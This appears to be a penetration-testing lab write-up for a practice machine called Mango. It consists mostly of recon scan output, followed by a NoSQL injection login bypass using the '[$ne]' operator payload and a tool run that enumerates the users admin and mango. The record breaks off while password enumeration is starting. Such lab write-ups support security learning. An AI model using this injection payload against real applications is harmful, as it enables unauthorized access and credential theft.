First AutoRecon to map the ports/services
[*] Scanning target 10.10.10.162
[*] Running service detection nmap-quick on 10.10.10.162
[*] Running service detection nmap-full-tcp on 10.10.10.162
[*] Running service detection nmap-top-20-udp on 10.10.10.162
[*] Service detection nmap-quick on 10.10.10.162 finished successfully in 32 seconds
[*] Found ssh on tcp/22 on target 10.10.10.162
[*] Found http on tcp/80 on target 10.10.10.162
[*] Found ssl/http on tcp/443 on target 10.10.10.162
[*] Running task tcp/22/sslscan on 10.10.10.162
[*] Running task tcp/22/nmap-ssh on 10.10.10.162
[*] Running task tcp/80/sslscan on 10.10.10.162
[*] Running task tcp/80/nmap-http on 10.10.10.162
[*] Running task tcp/80/curl-index on 10.10.10.162
[*] Running task tcp/80/curl-robots on 10.10.10.162
[*] Running task tcp/80/wkhtmltoimage on 10.10.10.162
[*] Running task tcp/80/whatweb on 10.10.10.162
[*] Task tcp/22/sslscan on 10.10.10.162 finished successfully in less than a second
[*] Task tcp/80/sslscan on 10.10.10.162 finished successfully in less than a second
[*] Task tcp/80/wkhtmltoimage on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/80/nikto on 10.10.10.162
[*] Running task tcp/80/gobuster on 10.10.10.162
[*] Running task tcp/443/sslscan on 10.10.10.162
[*] Task tcp/80/curl-index on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/nmap-http on 10.10.10.162
[*] Task tcp/80/curl-robots on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/curl-index on 10.10.10.162
[*] Task tcp/443/curl-index on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/curl-robots on 10.10.10.162
[*] Task tcp/443/curl-robots on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/wkhtmltoimage on 10.10.10.162
[*] Task tcp/443/wkhtmltoimage on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/whatweb on 10.10.10.162
[*] Task tcp/80/whatweb on 10.10.10.162 finished successfully in 3 seconds
[*] Running task tcp/443/nikto on 10.10.10.162
[*] Task tcp/443/whatweb on 10.10.10.162 finished successfully in 5 seconds
[*] Running task tcp/443/gobuster on 10.10.10.162
[*] Task tcp/443/sslscan on 10.10.10.162 finished successfully in 15 seconds
[*] Service detection nmap-top-20-udp on 10.10.10.162 finished successfully in 47 seconds
[*] Task tcp/22/nmap-ssh on 10.10.10.162 finished successfully in 16 seconds
[*] [20:13:45] - There are 7 tasks still running on 10.10.10.162
[*] Task tcp/80/nmap-http on 10.10.10.162 finished successfully in 41 seconds
[*] Task tcp/443/nmap-http on 10.10.10.162 finished successfully in 1 minute, 5 seconds
[*] [20:14:45] - There are 5 tasks still running on 10.10.10.162
[*] [20:15:45] - There are 5 tasks still running on 10.10.10.162
[*] Service detection nmap-full-tcp on 10.10.10.162 finished successfully in 3 minutes, 13 seconds
[*] Task tcp/80/gobuster on 10.10.10.162 finished successfully in 7 minutes, 15 seconds
[*] Task tcp/80/nikto on 10.10.10.162 finished successfully in 9 minutes, 36 seconds
[*] Task tcp/443/gobuster on 10.10.10.162 finished successfully in 13 minutes, 21 seconds
[*] Task tcp/443/nikto on 10.10.10.162 finished successfully in 34 minutes, 26 seconds
[*] Finished scanning target 10.10.10.162 in 35 minutes, less than a second
[*] Finished scanning all targets in 35 minutes, less than a second!
Nmap TCP results
Nmap scan report for 10.10.10.162
Host is up, received user-set (0.052s latency).
Scanned at 2020-03-12 20:12:59 EDT for 179s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXYCdNRHET98F1ZTM+H8yrD9KXeRjvIk9e78JkHdzcqCq6zcvYIqEZReb3FSCChJ9mxK6E6vu5xBY7R6Gi0V31dx0koyaieEMd67PU+9UcjaAujbDS3UgYzySN+c5GV/ssmA6wWHu4zz+k+qztqdYFPh0/TgrC/wNPWHOKdpivgoyk3+F/retyGdKUNGjypXrw6v1faHiLOIO+zNHorxB304XmSLEFswiOS8UsjplIbud2KhWPEkY4s4FyjlpfpVdgPljbjijm7kcPNgpTXLXE51oNE3Q5w7ufO5ulo3Pqm0x+4d+SEpCE4g0+Yb020zK+JlKsp2tFJyLqTLan1buN
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqSZ4iBMzBrw2lEFKYlwO2qmw0WPf76ZhnvWGK+LJcHxvNa4OQ/hGuBWCjVlTcMbn1Te7D8jGwPgbcVpuaEld8=
| 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1sFdLYacK+1f4J+i+NCAhG+bj8xzzydNhqA1Ndo/xt
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-09-27T14:21:19
| Not valid after: 2020-09-26T14:21:19
| MD5: b797 d14d 485f eac3 5cc6 2fed bb7a 2ce6
| SHA-1: b329 9eca 2892 af1b 5895 053b f30e 861f 1c03 db95
| -----BEGIN CERTIFICATE-----
| MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
| VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
| TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
| b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
| HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
| DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
| diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
| bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
| hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
| f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
| G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
| 9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
| 2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
| arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
| UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
| BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
| AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
| HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
| JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
| YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
| Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
| /UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.18 (92%), Android 4.2.2 (Linux 3.4) (92%), Linux 2.6.32 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/12%OT=22%CT=1%CU=30651%PV=Y%DS=2%DC=T%G=Y%TM=5E6AD0B
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M
OS:54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%
OS:O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%
OS:DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%
OS:CD=S)IE(R=N)
Uptime guess: 23.448 days (since Tue Feb 18 08:30:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 47.01 ms 10.10.14.1
2 49.55 ms 10.10.10.162
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 12 20:15:58 2020 -- 1 IP address (1 host up) scanned in 193.32 seconds
WhatWeb results:
WhatWeb report for http://10.10.10.162:80
Status : 403 Forbidden
Title : 403 Forbidden
IP : 10.10.10.162
Country : RESERVED, ZZ
Summary : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
HTTP Headers:
HTTP/1.1 403 Forbidden
Date: Fri, 13 Mar 2020 00:14:39 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1
WhatWeb report for https://10.10.10.162:443
Status : 200 OK
Title : Mango | Search Base
IP : 10.10.10.162
Country : RESERVED, ZZ
Summary : HTML5, Script, Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 13 Mar 2020 00:14:40 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1844
Connection: close
Content-Type: text/html; charset=UTF-8
Nikto results
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.162
+ Target Hostname: 10.10.10.162
+ Target Port: 80
+ Start Time: 2020-03-12 20:13:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7864 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2020-03-12 20:22:52 (GMT-4) (574 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.162
+ Target Hostname: 10.10.10.162
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
+ Start Time: 2020-03-12 20:13:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '10.10.10.162' does not match certificate's names: staging-order.mango.htb
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2020-03-12 20:47:45 (GMT-4) (2065 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Ssl scan
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)
Connected to 10.10.10.162
Testing SSL server 10.10.10.162 on port 443 using SNI name 10.10.10.162
TLS Fallback SCSV:
Server supports TLS Fallback SCSV
TLS renegotiation:
Secure session renegotiation supported
TLS Compression:
Compression disabled
Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-CAMELLIA256-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA256 DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.2 256 bits AES256-GCM-SHA384
Accepted TLSv1.2 256 bits AES256-SHA256
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 256 bits CAMELLIA256-SHA256
Accepted TLSv1.2 256 bits CAMELLIA256-SHA
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-CAMELLIA128-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA256 DHE 2048 bits
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.2 128 bits AES128-GCM-SHA256
Accepted TLSv1.2 128 bits AES128-SHA256
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.2 128 bits CAMELLIA128-SHA256
Accepted TLSv1.2 128 bits CAMELLIA128-SHA
Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 256 bits CAMELLIA256-SHA
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.1 128 bits AES128-SHA
Accepted TLSv1.1 128 bits CAMELLIA128-SHA
Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 256 bits CAMELLIA256-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
Accepted TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 128 bits CAMELLIA128-SHA
SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
/UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
-----END CERTIFICATE-----
Version: 2
Serial Number: ae:50:89:29:a8:06:f1:32
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
Not valid before: Sep 27 14:21:19 2019 GMT
Not valid after: Sep 26 14:21:19 2020 GMT
Subject: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
Public Key Algorithm: rsaEncryption
RSA Public Key: (2048 bit)
Public-Key: (2048 bit)
Modulus:
00:e5:f8:a6:49:f8:2a:df:1b:1d:52:46:7a:75:c6:
ea:18:f0:e6:08:02:49:04:e2:b6:7f:96:b6:e4:0b:
77:1e:de:6b:d5:28:e2:22:eb:e8:bc:34:a6:30:78:
d5:9a:56:c5:ea:a5:fb:0b:a7:fb:52:6f:b5:56:db:
ff:06:29:d9:7e:9b:8c:11:eb:32:0c:7d:15:1b:fe:
17:e6:be:a8:d4:63:1f:ae:f8:ef:01:74:36:72:e5:
44:23:11:c6:1f:5e:c9:33:a8:0a:28:4a:69:9e:0b:
85:c1:53:21:0b:8f:ca:50:88:ee:68:15:d7:f6:e7:
40:f5:e6:85:25:e8:98:12:97:5f:49:45:72:b2:8c:
50:0d:d8:93:26:1c:32:50:83:e7:b0:5a:df:d3:6d:
67:54:e2:35:fd:32:64:1c:08:0b:cf:19:75:bf:1a:
cc:9f:0a:cb:d9:f2:f2:80:3b:75:21:03:7c:52:11:
85:ff:65:13:93:79:55:7c:4b:1e:d9:fd:a4:be:fe:
86:6e:68:f1:04:67:d6:08:d0:3f:02:3f:35:d0:e1:
06:54:c8:92:e5:22:eb:6a:b2:17:08:65:65:f7:9d:
d0:08:3f:6f:8b:eb:47:07:f7:3e:20:26:93:b4:77:
74:66:2b:bf:80:66:dd:29:d0:88:b4:d0:f5:af:d9:
0e:11
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
85:AD:9B:04:E6:57:A3:81:32:7E:8B:D6:FA:9B:C5:2C:65:56:05:11
X509v3 Authority Key Identifier:
keyid:85:AD:9B:04:E6:57:A3:81:32:7E:8B:D6:FA:9B:C5:2C:65:56:05:11
X509v3 Basic Constraints: critical
CA:TRUE
Verify Certificate:
self signed certificate
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048
Subject: staging-order.mango.htb
Issuer: staging-order.mango.htb
Not valid before: Sep 27 14:21:19 2019 GMT
Not valid after: Sep 26 14:21:19 2020 GMT
Browsing the two websites, on ports 80 and 443. The web server on the 80 returns a 403 error and the https server returns a certificate error
I add a new entry in the /etc/hosts file for the staging-order.mango.htb host
kali@kali:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.162 staging-order.mango.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Using the FQDN we land on a web page:
So I will do again the nikto scan, this time against the FQDN, and also the dirsearch will run using the name.
The new nikto scans show no other things.
Using dirsearch to enumerate hidden directory
kali@kali:~$ /home/kali/tools/dirsearch/dirsearch.py -u staging-order.mango.htb -E -x 403
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8673
Error Log: /home/kali/tools/dirsearch/logs/errors-20-03-13_09-00-26.log
Target: staging-order.mango.htb
[09:00:26] Starting:
[09:01:01] 302 - 0B - /home.php -> index.php
[09:01:02] 200 - 4KB - /index.php
[09:01:03] 200 - 4KB - /index.php/login/
[09:01:23] 200 - 0B - /vendor/composer/autoload_classmap.php
[09:01:23] 200 - 0B - /vendor/autoload.php
[09:01:23] 200 - 0B - /vendor/composer/autoload_files.php
[09:01:23] 200 - 0B - /vendor/composer/autoload_namespaces.php
[09:01:23] 200 - 0B - /vendor/composer/autoload_psr4.php
[09:01:23] 200 - 0B - /vendor/composer/autoload_real.php
[09:01:23] 200 - 0B - /vendor/composer/ClassLoader.php
[09:01:23] 200 - 4KB - /vendor/composer/installed.json
[09:01:23] 200 - 3KB - /vendor/composer/LICENSE
[09:01:23] 200 - 0B - /vendor/composer/autoload_static.php
Analyzing the files found during by dirsearch we know the service uses Mongo as backend DB:
kali@kali:~$ curl http://staging-order.mango.htb/vendor/composer/installed.json
[
{
"name": "alcaeus/mongo-php-adapter",
"version": "1.1.9",
"version_normalized": "1.1.9.0",
"source": {
"type": "git",
"url": "https://github.com/alcaeus/mongo-php-adapter.git",
"reference": "93b81ebef1b3a4d3ceb72f13a35057fe08a5048f"
},
To recap the VM is running the software/services:
OpenSSH 7.6p1
Apache 2.4.29
Mongo DB
Exploitation
Very often the MongoDB/PHP applications are vulnerable to noSQL Injection Using BurpSuite I will check if the application is vulnerable. I'm intercepting the login request, using a random username/password. I try to bypass the authentication process.
I intercept the login request and insert the [$ne] operator in the username and in the password POST parameters trying to fool the app, and this works. Changing the POST data from
username=test&password=test&login=login
to
username[$ne]=test&password[$ne]=test&login=login
we bypass the authentication method and we are redirect to a "work in progress" page and we found the admin email. There are some tools to take advantage of this kind of injections. I'll use https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git to discover users and passwords
kali@kali:~/tools/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
...
So there are two users, admin and mango We can also enumerate the passwords
kali@kali:~/tools/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login -m POST
No pattern starts with '0'
